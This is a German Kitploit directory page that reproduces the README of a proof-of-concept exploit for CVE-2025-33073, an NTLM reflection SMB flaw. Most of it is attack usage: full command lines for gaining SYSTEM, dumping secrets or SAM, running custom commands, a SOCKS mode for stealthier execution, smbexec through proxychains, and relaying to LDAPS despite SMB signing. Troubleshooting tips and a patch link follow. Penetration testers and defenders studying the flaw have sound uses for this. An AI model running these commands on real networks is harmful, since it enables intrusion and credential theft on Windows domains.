Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-33073 — PoC Exploit für die NTLM-Reflexion-SMB-Sicherheitslücke. | Kitploit
Tools/GitHubGitHub/mverschu/cve-2025-33073
Privilege EscalationSchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsAuthentifizierung
GitHubmverschu/cve-2025-33073

CVE-2025-33073

PoC Exploit für die NTLM-Reflexion-SMB-Sicherheitslücke.

Repository anzeigen
714136vor 6 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-33073

PoC-Exploit für den NTLM-Reflection-SMB-Fehler.

image

Alle Credits gehen an die offizielle Forschung:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Voraussetzungen

Betriebssystem: Kali Linux (hat die meisten Pakete vorinstalliert).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (im Repository enthalten)

Einrichtung

Das Tool verwendet automatisch eine virtuelle Umgebung. Um es einzurichten, führen Sie Folgendes aus:

root@kitploit:~
./setup.sh

Dadurch wird eine virtuelle Umgebung erstellt und alle erforderlichen Abhängigkeiten installiert, einschließlich ldap3-bleeding-edge==2.10.1.1337.

Beispielverwendung

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
image

Benutzerdefinierter Befehl
Anstatt secretsdump auszuführen, kann ein benutzerdefinierter Befehl ausgeführt werden.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

image

SOCKS
Für eine verdecktere Ausführung von Befehlen nach erfolgreicher Verbindung als SYSTEM. --target und --target-ip sollten hier gleich sein.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks

image Außerdem kann ein benutzerdefinierter Befehl über proxychains ausgeführt werden, anstatt SAM zu dumpen.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

Exploit-Relay zu LDAPS auch bei aktiviertem SMB-Signing

Es wurden Nachforschungen durchgeführt, ob der Reflection wirklich nicht mit aktiviertem SMB-Signing funktioniert, was zur Entdeckung von Fehlern führte: Wenn SIGN/SEAL aus dem Paket entfernt werden, ist es möglich, von SMB zu LDAPS zu relayen, was aufgrund des MIC normalerweise nicht möglich ist.

Dank an:

  • https://github.com/decoder-it/impacket-partial-mic/
  • https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
  • https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/
root@kitploit:~
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
image

Manueller Exploit ohne DNS-Anforderung

Wenn Sie sich im selben Broadcast-Domain wie das Gerät befinden und es für LLMNR-Poisoning anfällig ist, ist es möglich, ein Gerät zu exploitieren, ohne einen DNS-Eintrag registrieren zu müssen.

image

Fehlerbehebung

  • Ich habe gesehen, dass der Angriff manchmal nicht funktioniert, weil der Hostname für den Angriff verwendet wird, was zu einer DNS-Abfrage von Kali führt. Wenn Kali den DNS-Server nicht verwendet oder Sie eine '/ FAILED'-Meldung von impacket-ntlmrelayx erhalten, versuchen Sie, den Host zu Ihrer /etc/hosts-Datei hinzuzufügen. Dies sollte dazu führen, dass der Angriff funktioniert.
  • Bei Verwendung der IP sollte der Angriff funktionieren. Manchmal führt mehrmaliges Ausführen zu einem SUCCESS statt Fehlschlag. Es ist bis jetzt nicht vollständig klar, warum das passiert. Ich denke, es hat etwas mit dem Netzwerk zu tun.
  • Versuchen Sie eine andere Coerce-Methode mit -M oder --method.

Wireshark

Lokale NTLM-Authentifizierung findet statt image

Lokale NTLM-Authentifizierung findet nicht statt, was zu einem FEHLGESCHLAGENEN Versuch führt image

Gut zu wissen

  • Der DNS-Eintrag sollte auch dem Client bekannt sein, was in manchen Fällen länger dauern kann. Mit länger meine ich ein paar Minuten.
  • Dies ist nur ein PoC, was bedeutet, dass AV/EDR-Umgehungen nicht versucht wurden zu umgehen. Verwendung auf eigene Gefahr.

Wie man es behebt

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

Tool herunterladen